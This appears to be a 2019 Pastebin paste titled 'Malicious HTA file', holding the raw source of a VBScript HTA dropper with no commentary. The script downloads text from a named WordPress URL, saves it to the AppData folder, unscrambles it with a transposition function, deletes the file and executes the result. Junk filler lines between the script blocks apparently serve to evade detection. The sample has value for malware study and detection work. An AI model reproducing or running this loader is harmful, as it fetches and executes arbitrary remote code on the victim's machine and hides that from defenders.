shotgunner101

Malicious HTA file

Nov 26th, 2019
219
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.10 KB | None | 0 0
  1. <html><script language="VBScript">
  2. Set Post0 = CreateObject("msxml2.xmlhttp")
  3. Set objFSO = CreateObject("Scripting.FileSystemObject")
  4. Set wShell=CreateObject("WScript.Shell")
  5. folder = wShell.ExpandEnvironmentStrings("%appdata%"):
  6. Post0.open "GET", "https://jonashartley.com/hilaryolsen/wp-includes/random_compat/1122/expres.php?op=macro",False
  7. Post0.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
  8. Post0.Send
  9. t0=Post0.responseText
  10. Set f = objFSO.CreateTextFile(folder+"\desktop.tmp", True)
  11. f.Write(t0)
  12. f.Close
  13. msgbox "dd"
  14. </script>
  15. sdgsdgkl
  16. dgdsfh
  17. sdfhs
  18. hsfhsdfh
  19. fhfshsdh
  20. dhgsdfh
  21. sdfhsd
  22. fh
  23. sdfh
  24. sd
  25. fh
  26. sd
  27. fh
  28.  
  29. ggggggggggggggggggggggggg
  30. fghdfhg
  31. fghfdjhdf
  32. jghfdjgdf
  33. jgfd
  34. jgdf
  35. jgdf
  36. jgggggjjjjjjjjjjjjj
  37. <script language="VBScript">
  38. Function Co00(c):L=Len(c):s="":For jx=0 To d-1:For ix=0 To Int(L/d)-1:s=s&Mid(c,ix*d+jx+1,1):Next:Next:s=s&Right(c,L-Int(L/d)*d):Co00=s:End Function
  39. Set f = objFSO.OpenTextFile(folder+"\desktop.tmp", 1, True):data = f.ReadAll:f.Close:d=5:data=Co00(data):objFSO.DeleteFile folder+"\desktop.tmp":execute(data)
  40. window.close()
  41. </script>
  42. </html>
Advertisement
Add Comment
Please, Sign In to add comment